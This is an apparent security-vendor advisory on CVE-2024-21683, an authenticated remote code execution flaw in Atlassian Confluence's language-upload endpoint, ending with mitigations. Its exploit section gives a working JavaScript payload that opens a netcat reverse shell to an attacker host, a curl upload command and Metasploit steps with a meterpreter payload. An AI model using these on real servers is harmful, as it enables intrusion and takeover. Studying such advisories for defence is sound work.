Jun 12, 2025
CVE-2024-21683 – Authenticated RCE via “Add a New Language” in Atlassian Confluence
Critical RCE vulnerability (CVE-2024-21683) in Atlassian Confluence Data Center and Server (v5.2–8.9.0) allows authenticated users to execute arbitrary code via malicious code macros.
OffSec Team
CVE-2024-21683 is a critical Remote Code Execution (RCE) vulnerability affecting self-hosted Atlassian Confluence Data Center and Server instances (versions 5.2 through 8.9.0). It allows authenticated attackers with permissions to add code macro languages to upload malicious scripts, resulting in arbitrary code execution on the host system.
- CVE ID: CVE-2024-21683
- Severity: High
- CVSS Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
- EPSS Score: 93.98%
- Published: May 21, 2024
- Affected Versions: Confluence Data Center ≤8.9.0; Server ≤8.5.8 LTS / ≤7.19.21 LTS
- Fixed Versions: Data Center ≥ 8.9.1; Server ≥ 8.5.9 LTS or 7.19.22 LTS
The vulnerability stems from inadequate input validation in the “Add a new language” feature accessed via:
POST /admin/plugins/newcode/addlanguage.actionThis endpoint expects a JavaScript language file, which is parsed by the RhinoLanguageParser. However, because the parser enables Java class access within the script, an attacker can inject malicious Java code (e.g., java.lang.Runtime.getRuntime().exec(…)) for RCE
- Must have authenticated access to Confluence with privilege to add new macro languages
- Instance must be on a vulnerable version (≤8.9.0 DC or ≤8.5.8/7.19.21 LTS Server)
- Network access to the Confluence web interface
1. Create exploit.js:
new java.lang.ProcessBuilder["(java.lang.String[])"](
["bash","-c","nc attacker-ip 4444 -e /bin/sh"]
).start();2. Send exploit:
curl -X POST http://target:8090/admin/plugins/newcode/addlanguage.action \
-F "atl_token=<CSRF_TOKEN>" \
-F "languageFile=@exploit.js;filename=exploit.js" \
-F "newLanguageName=evil"Upon upload, the code executes, spawning a reverse shell. POC link: Github
Metasploit Module
Rapid7 released a Metasploit module exploit/multi/http/atlassian_confluence_rce_cve_2024_21683. Here’s the usage flow:
msf > use exploit/multi/http/atlassian_confluence_rce_cve_2024_21683
msf exploit(...) > set RHOSTS 10.10.10.5
msf exploit(...) > set admin_user admin
msf exploit(...) > set admin_pass admin
msf exploit(...) > set payload cmd/linux/http/x86/meterpreter_reverse_https
msf exploit(...) > exploitIf credentials are valid and privileges suffice, the module will upload and execute the malicious script, yielding a shell
- Upgrade Confluence to fixed versions: DC ≥ 8.9.1; Server ≥ 8.5.9 LTS / 7.19.22 LTS
- Restrict “Add language” privileges to trusted admins
- Monitor logs for API calls to /admin/plugins/newcode/addlanguage.action
- Immediate WAF rules: block unauthorized POSTs to this endpoint
Stay in the know: Become an OffSec Insider
Get the latest updates about resources, events & promotions from OffSec!
Latest from OffSec
Research & Tutorials
CVE-2024-21683 – Authenticated RCE via “Add a New Language” in Atlassian Confluence
Critical RCE vulnerability (CVE-2024-21683) in Atlassian Confluence Data Center and Server (v5.2–8.9.0) allows authenticated users to execute arbitrary code via malicious code macros.
Jun 12, 2025
2 min read
Research & Tutorials
CVE‑2025‑49113 – Post‑Auth Remote Code Execution in Roundcube via PHP Object Deserialization
A critical RCE vulnerability (CVSS 9.9) in Roundcube Webmail (
Jun 12, 2025
3 min read
Research & Tutorials
CVE-2025-24893 – Unauthenticated Remote Code Execution in XWiki via SolrSearch Macro
An RCE vulnerability in XWiki was found allowing unauthenticated attackers to execute arbitrary Groovy code remotely without authentication or prior access.
Jun 5, 2025
2 min read